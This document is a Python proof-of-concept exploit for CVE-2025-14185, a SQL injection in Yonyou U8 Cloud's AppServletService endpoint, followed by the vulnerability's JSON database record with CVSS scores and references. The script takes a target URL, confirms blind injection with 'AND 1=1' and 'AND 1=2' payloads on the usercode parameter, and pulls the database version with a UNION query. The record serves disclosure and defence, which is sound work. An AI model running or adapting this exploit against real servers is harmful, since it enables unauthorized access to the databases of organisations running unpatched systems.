CVE-2025-14185

import requests import sys # CVE-2025-14185 SQL Injection PoC for Yonyou U8 Cloud # Target: nc/pubitf/erm/mobile/appservice/AppServletService.class # Parameter: usercode def exploit_sqli(target_url, payload): """ Exploit SQL injection via usercode parameter Args: target_url: Base URL of vulnerable Yonyou U8 Cloud server payload: SQL injection payload string Returns: Response content or error message """ endpoint = f"{target_url}/nc/pubitf/erm/mobile/appservice/AppServletService" params = { 'usercode': payload } try: response = requests.get(endpoint, params=params, timeout=10) return response.text except requests.exceptions.RequestException as e: return f"Request failed: {str(e)}" def test_blind_sqli(target_url): """ Test for boolean-based blind SQL injection """ # True condition payload true_payload = "admin' AND 1=1--" # False condition payload false_payload = "admin' AND 1=2--" true_resp = exploit_sqli(target_url, true_payload) false_resp = exploit_sqli(target_url, false_payload) if true_resp != false_resp: print("[+] Blind SQL injection confirmed!") return True return False def extract_db_version(target_url): """ Extract database version using UNION-based injection """ payload = "admin' UNION SELECT @@version--" return exploit_sqli(target_url, payload) def main(): if len(sys.argv) < 2: print("Usage: python cve_2025_14185.py <target_url>") print("Example: python cve_2025_14185.py http://vulnerable-server:80") sys.exit(1) target = sys.argv[1].rstrip('/') print(f"[*] Testing CVE-2025-14185 on {target}") if test_blind_sqli(target): print("[*] Database version:", extract_db_version(target)) if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-14185", "sourceIdentifier": "[email protected]", "published": "2025-12-07T05:15:59.987", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in Yonyou U8 Cloud 5.0/5.0sp/5.1/5.1sp. The affected element is an unknown function of the file nc/pubitf/erm/mobile/appservice/AppServletService.class. Such manipulation of the argument usercode leads to sql injection. The attack may be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/798xuezhiqian-collab/vuln01", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.334605", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.334605", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.698601", "source": "[email protected]"}]}}